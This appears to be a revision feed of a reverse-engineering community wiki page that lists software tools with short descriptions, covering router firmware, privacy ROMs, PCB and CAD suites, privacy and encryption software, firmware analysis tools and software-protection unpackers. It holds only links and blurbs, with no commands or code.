*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.&lt;br /&gt;
&lt;br /&gt;
*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.&lt;br /&gt;
&lt;br /&gt;
*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.&lt;br /&gt;
&lt;br /&gt;
=====Smartphones [Android &amp;quot;de-google&amp;quot;]=====&lt;br /&gt;
&lt;br /&gt;
*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.&lt;br /&gt;
&lt;br /&gt;
*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.&lt;br /&gt;
&lt;br /&gt;
*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.&lt;br /&gt;
&lt;br /&gt;
*[https://calyxos.org/ CalyxOS] - is a privacy-focused, &amp;quot;de-googled&amp;quot; Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.&lt;br /&gt;
&lt;br /&gt;
*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.&lt;br /&gt;
&lt;br /&gt;
*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Tools for opening CAD or Boardview files====&lt;br /&gt;
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.&lt;br /&gt;
&lt;br /&gt;
*[https://pldaniels.com/flexbv5/ FlexBV]  - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards&lt;br /&gt;
&lt;br /&gt;
*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the &amp;quot;Test_Link&amp;quot; software and &amp;quot;Landrex&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.&lt;br /&gt;
&lt;br /&gt;
*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.&lt;br /&gt;
&lt;br /&gt;
*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]&lt;br /&gt;
&lt;br /&gt;
For resources to open in your favorite boardview program visit &lt;br /&gt;
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -&amp;gt; Datasheets boardviews &amp;amp; schematics]]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Custom PCB Development Software====&lt;br /&gt;
&lt;br /&gt;
=====Definition and Purpose=====&lt;br /&gt;
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.&lt;br /&gt;
&lt;br /&gt;
::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.&lt;br /&gt;
&lt;br /&gt;
::'''Integration Between CAD and EDA'''&lt;br /&gt;
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.&lt;br /&gt;
&lt;br /&gt;
=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.&lt;br /&gt;
&lt;br /&gt;
*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].&lt;br /&gt;
&lt;br /&gt;
*[https://fritzing.org/ Fritzing] -  is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.&lt;br /&gt;
&lt;br /&gt;
*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.&lt;br /&gt;
&lt;br /&gt;
*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.&lt;br /&gt;
&lt;br /&gt;
*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.&lt;br /&gt;
&lt;br /&gt;
=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.&lt;br /&gt;
&lt;br /&gt;
*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.&lt;br /&gt;
&lt;br /&gt;
*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.&lt;br /&gt;
&lt;br /&gt;
*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
====Other software====&lt;br /&gt;
&lt;br /&gt;
=====Display Driver Utilities (Windows)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).&lt;br /&gt;
&lt;br /&gt;
*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing &amp;quot;bloatware&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.&lt;br /&gt;
&lt;br /&gt;
*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively &amp;quot;trimming&amp;quot; down the install base. It's not an official Nvidia utility.&lt;br /&gt;
&lt;br /&gt;
=====Host Based Firewall [Windows FOSS]=====&lt;br /&gt;
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.&lt;br /&gt;
&lt;br /&gt;
=====Web Browsing=====&lt;br /&gt;
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.&lt;br /&gt;
&lt;br /&gt;
::Extensions &amp;amp; Configurations&lt;br /&gt;
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.&lt;br /&gt;
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.&lt;br /&gt;
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.&lt;br /&gt;
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.&lt;br /&gt;
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.&lt;br /&gt;
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.&lt;br /&gt;
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] -  is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.&lt;br /&gt;
&lt;br /&gt;
======Public Networks======&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.&lt;br /&gt;
&lt;br /&gt;
*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.&lt;br /&gt;
&lt;br /&gt;
*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.&lt;br /&gt;
&lt;br /&gt;
*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.&lt;br /&gt;
&lt;br /&gt;
*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.&lt;br /&gt;
&lt;br /&gt;
*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.&lt;br /&gt;
&lt;br /&gt;
=====Email Clients / Email Encryption Standards=====&lt;br /&gt;
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].&lt;br /&gt;
&lt;br /&gt;
*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.&lt;br /&gt;
&lt;br /&gt;
*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].&lt;br /&gt;
&lt;br /&gt;
*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.&lt;br /&gt;
&lt;br /&gt;
=====Chat Applications / Platforms=====&lt;br /&gt;
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.&lt;br /&gt;
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.&lt;br /&gt;
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.&lt;br /&gt;
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.&lt;br /&gt;
::XMPP clients &amp;amp; extensions&lt;br /&gt;
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.&lt;br /&gt;
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.&lt;br /&gt;
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.&lt;br /&gt;
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.&lt;br /&gt;
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.&lt;br /&gt;
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.&lt;br /&gt;
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.&lt;br /&gt;
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.&lt;br /&gt;
::Discord client advice&lt;br /&gt;
:::*1. Stop using the installed electron PC based version. Use the web version.&lt;br /&gt;
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).&lt;br /&gt;
&lt;br /&gt;
=====File Archiver Utilities=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.7-zip.org/ 7-Zip]  - is a free and open source file archiver.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.&lt;br /&gt;
&lt;br /&gt;
*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.&lt;br /&gt;
&lt;br /&gt;
=====Disk Encryption Software=====&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools&lt;br /&gt;
&lt;br /&gt;
*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].&lt;br /&gt;
&lt;br /&gt;
=====Image Manipulation Tools=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.&lt;br /&gt;
&lt;br /&gt;
*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.&lt;br /&gt;
&lt;br /&gt;
=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.&lt;br /&gt;
&lt;br /&gt;
*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.&lt;br /&gt;
&lt;br /&gt;
*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.&lt;br /&gt;
&lt;br /&gt;
*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.&lt;br /&gt;
&lt;br /&gt;
*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.&lt;br /&gt;
&lt;br /&gt;
*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.&lt;br /&gt;
&lt;br /&gt;
*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.&lt;br /&gt;
&lt;br /&gt;
=====Video Recording and Live Streaming=====&lt;br /&gt;
&lt;br /&gt;
*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.&lt;br /&gt;
&lt;br /&gt;
*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.&lt;br /&gt;
&lt;br /&gt;
====Search engine (self-hosted &amp;amp; open-source)====&lt;br /&gt;
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.&lt;br /&gt;
&lt;br /&gt;
====Social Network / Fediverse (self-hosted &amp;amp; open-source)====&lt;br /&gt;
&lt;br /&gt;
*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.&lt;br /&gt;
&lt;br /&gt;
====Privacy-focused Software Directory====&lt;br /&gt;
&lt;br /&gt;
*[https://prism-break.org/ prism-break.org] -  is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.&lt;br /&gt;
&lt;br /&gt;
==Education==&lt;br /&gt;
    &lt;br /&gt;
:[[:Literature|See the literature wiki page for all the resources.]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3308</id>
		<title>Software Tools</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3308"/>
		<updated>2026-04-04T17:51:54Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add XEP-0384: OMEMO Encryption + client&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Software_wiki_banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!&lt;br /&gt;
==Tool Index==&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====RF Signals Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnuradio.org/ GNU Radio]  - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -&amp;gt; Import –&amp;gt; Raw Data -&amp;gt; Radio Wave File)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Firmware Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ReFirmLabs/binwalk binwalk]  - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!&lt;br /&gt;
&lt;br /&gt;
====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====&lt;br /&gt;
&lt;br /&gt;
*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] -  is a tool designed to extract files from any type of extractable file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.&lt;br /&gt;
&lt;br /&gt;
=====Themida Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.&lt;br /&gt;
&lt;br /&gt;
=====VMProtect Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
======VMProtect 2======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)&lt;br /&gt;
*vmassembler (VMProtect 2 Virtual Instruction Assembler)&lt;br /&gt;
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)&lt;br /&gt;
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)&lt;br /&gt;
*vmhook (VMProtect 2 Virtual Machine Hooking Library)&lt;br /&gt;
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)&lt;br /&gt;
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)&lt;br /&gt;
*vmdevirt (VMProtect Devirtualization)&lt;br /&gt;
&lt;br /&gt;
======VMProtect 3======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmdevirt (VMProtect 3 Static Devirtualization)&lt;br /&gt;
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)&lt;br /&gt;
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)&lt;br /&gt;
&lt;br /&gt;
=====Code Virtualizer (Oreans Technologies)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).&lt;br /&gt;
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.&lt;br /&gt;
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.&lt;br /&gt;
&lt;br /&gt;
=====Enigma Protector=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.&lt;br /&gt;
&lt;br /&gt;
======OllyDbg Scripts======&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]&lt;br /&gt;
&lt;br /&gt;
=====Generic Code Virtualizer=====&lt;br /&gt;
